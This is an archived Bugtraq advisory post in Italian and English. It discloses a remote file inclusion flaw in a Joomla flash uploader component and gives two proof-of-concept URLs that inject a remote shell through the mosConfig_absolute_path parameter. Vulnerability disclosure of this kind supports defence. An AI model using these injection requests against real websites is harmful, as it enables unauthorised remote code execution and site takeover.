Bugtraq mailing list archives
JoomlaFlash Component Multiple Remote File Inclusion
From: Smasher () ciucciamiilcalzino it
Date: 17 Jan 2008 00:06:03 -0000
Autore: Smasher Sito: http://warwolfz.altervista.org Tipo: Remote File Inclusion Rischio: Alto A remote attacker can gain access to your website throug a Remote shell inclusion. PoC available: http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell? http://sito.it/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell? Regards. Smasher
Current thread:
- JoomlaFlash Component Multiple Remote File Inclusion Smasher (Jan 17)